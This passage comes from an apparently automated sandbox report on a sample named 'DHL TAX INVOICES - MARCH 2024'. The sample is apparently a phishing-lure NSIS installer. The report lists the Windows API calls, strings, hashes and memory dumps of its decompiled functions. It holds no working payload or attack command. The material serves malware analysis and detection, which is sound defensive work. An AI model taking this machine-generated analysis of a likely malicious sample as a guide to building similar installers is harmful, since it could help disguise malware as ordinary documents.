                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                              • Part of subcall function 004052DD: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                            • CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
                                                            • ShowWindow.USER32(00000000,00000005), ref: 00402E38
                                                              • Part of subcall function 00402D83: MulDiv.KERNEL32(0005B2EB,00000064,0005EA5E), ref: 00402D98
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                            • String ID: ... %d%%
                                                            • API String ID: 722711167-2449383134
                                                            • Opcode ID: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                            • Instruction ID: 67f39cb704aca6262626a7976268bb3bb8a333bdab68892006d91dd8afb4411f
                                                            • Opcode Fuzzy Hash: 2598da54cc89f43c600d8ada73a31ae54370e6bdc16888383da25aa760d7781d
                                                            • Instruction Fuzzy Hash: 96016D70541614EBC721AB60EF4DA9B7A68AF00706B14417FF885F12E0CBF85865CBEE
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404BA7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC2
                                                            • GetMessagePos.USER32 ref: 00404BCA
                                                            • ScreenToClient.USER32(?,?), ref: 00404BE4
                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BF6
                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C1C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Message$Send$ClientScreen
                                                            • String ID: f
                                                            • API String ID: 41195575-1993550816
                                                            • Opcode ID: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction ID: 45e0f6331f39cfe7836e80c9775163861a3897288b26a0b158bc224782e9bc0b
                                                            • Opcode Fuzzy Hash: 0086211f2de0e1ca33d279ef662edcfa4b2f35d2ca496e99dd6aa4820b9c6f7a
                                                            • Instruction Fuzzy Hash: C9015271901218BAEB00DB94DD45FFEBBBCAF54711F10012BBA51B61D0C7B495018B54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401D56 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(?), ref: 00401D59
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                            • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                            • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                            • CreateFontIndirectW.GDI32(0040CDE0), ref: 00401DD1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                            • String ID: Tahoma
                                                            • API String ID: 3808545654-3580928618
                                                            • Opcode ID: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                            • Instruction ID: 9e8fd183d3d9d3ef172346538d4b27734d94fdc92d2c471f4f64b2fa811a60c8
                                                            • Opcode Fuzzy Hash: 020d429652f6eb968a81cc61bdee73d82fb2a6d644655b906a561d6cebbfb8f5
                                                            • Instruction Fuzzy Hash: F601A271544641EFEB016BB0AF4AF9A3F75BB65301F104579F152B61E2CA7C0006AB2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                            • wsprintfW.USER32 ref: 00402D56
                                                            • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                            • API String ID: 1451636040-1158693248
                                                            • Opcode ID: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                            • Instruction ID: 006a23aec332b8a1771af90dfa9c1e08c84c5b856183a3bf167901723993fe13
                                                            • Opcode Fuzzy Hash: f920e2d473a8442ab140d7cb001c2dea54e1cd42605ecc10fb631262ba466dce
                                                            • Instruction Fuzzy Hash: 2FF0367050020CABEF206F50DD49BEA3B69FF44305F00803AFA55B51D0DBF959558F59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                            • GlobalFree.KERNEL32(?), ref: 004028E9
                                                            • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                            • CloseHandle.KERNEL32(?), ref: 00402914
                                                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                            • String ID:
                                                            • API String ID: 2667972263-0
                                                            • Opcode ID: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                            • Instruction ID: 9003099e8900d80eaa65f9bf21adae6f43ee9946aaa6f9d478ae9c17af360c06
                                                            • Opcode Fuzzy Hash: 268536b817805fd7c6aa0ddf0c0313c96854f1d95891718e15f9d7c13f840f6f
                                                            • Instruction Fuzzy Hash: D6216F72801118BBCF216FA5CE49D9E7F79EF09364F24423AF550762E0CB794E419B98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00404A99 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3A
                                                            • wsprintfW.USER32 ref: 00404B43
                                                            • SetDlgItemTextW.USER32(?,00423728), ref: 00404B56
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ItemTextlstrlenwsprintf
                                                            • String ID: %u.%u%s%s$(7B
                                                            • API String ID: 3540041739-1320723960
                                                            • Opcode ID: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                            • Instruction ID: 8555a1dc09e6b234f76c08cd80d60a8511de1cbf1cdbca66d7a603e4fd23a7b2
                                                            • Opcode Fuzzy Hash: 97f8edb7a0e5a20212aa5a449d05d7effc420c8931a1b74a790ae22a69f051c3
                                                            • Instruction Fuzzy Hash: E911EB736441283BDB0095AD9C45F9E3298DB85378F150237FA26F71D1DA79D82286EC
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001096 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 25libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,0000003F,?,1000113F), ref: 100010A5
                                                            • GetProcAddress.KERNEL32(00000000), ref: 100010AC
                                                            • GetCurrentProcess.KERNEL32(?,?,0000003F,?,1000113F), ref: 100010BC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1636824093.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636907483.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636928724.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636977025.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                            • String ID: IsWow64Process$kernel32
                                                            • API String ID: 4190356694-3789238822
                                                            • Opcode ID: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                            • Instruction ID: 3ef6a93ad146ebeaf0d17e4587e90b9f2b778901b0e47637b23e27d0b58942e2
                                                            • Opcode Fuzzy Hash: c92513acdc9b6eec232b65c07616bbc12a548fba582b79c45e34bb9a570c82f0
                                                            • Instruction Fuzzy Hash: F3E04672905228ABFA10D7E18C4CA8F3BACEB042C1B000511FA01D310DEAA0DA009AA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402C20
                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                            • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: Close$DeleteEnumOpen
                                                            • String ID:
                                                            • API String ID: 1912718029-0
                                                            • Opcode ID: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                            • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
                                                            • Opcode Fuzzy Hash: b379a38b382f3674851f683a1545770b769e1215edb99d074c526d7d0dba3b0f
                                                            • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 10001849 Relevance: 7.5, APIs: 5, Instructions: 44stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00000000,00000000,00000000,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001859
                                                            • lstrlenW.KERNEL32(?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001864
                                                            • lstrcmpiW.KERNEL32(?,?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001882
                                                            • CharNextW.USER32(?,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 10001894
                                                            • lstrlenW.KERNEL32(00000000,?,?,100012F5,00000000,/TIMEOUT=,00000000), ref: 1000189D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1636843545.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1636824093.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636907483.0000000010002000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636928724.0000000010003000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                            • Associated: 00000000.00000002.1636977025.0000000010004000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                            • String ID:
                                                            • API String ID: 190613189-0
                                                            • Opcode ID: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                            • Instruction ID: 16644b8c66c095f8957e8181be225378e242880d30504b603972565d7ff9e5a1
                                                            • Opcode Fuzzy Hash: 65246361145c8fe2793ea78b56644e20d2b7f67d4f52c02e1ae136f7ea0f5d06
                                                            • Instruction Fuzzy Hash: DC011D35600628EFEB11DFA5CC809DE77A8EF452D07658066FD04D7225EB70DA41DB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,?), ref: 00401D00
                                                            • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                            • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                            • String ID:
                                                            • API String ID: 1849352358-0
                                                            • Opcode ID: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
                                                            • Instruction ID: c287ee2e14a47dfcdc45124cadc9b4dd0eb33b5564dd8f2f51e592e83ba53e14
                                                            • Opcode Fuzzy Hash: b7905a2ed1943a781b93953453739dfbfd242ee40c7241d1663efba9732d4851
                                                            • Instruction Fuzzy Hash: 33F0E172600504AFD701DBE4DE88CEEBBBDEB48311B104476F541F51A1CA749D018B38
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1635212973.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1635192748.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635233413.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635249030.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1635411422.000000000049A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL TAX INVOICES - MARCH 2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Timeout
                                                            • String ID: !
                                                            • API String ID: 1777923405-2657877971
                                                            • Opcode ID: 298dafdcb9fb76c6349735f3086c7c7de60bc97eebb8a6152003ba88438aff8e
                                                            • Instruction ID: 9ab6cbc1baff8286944736a18d7265b6422843b7a732a624d4201333bc7942cf
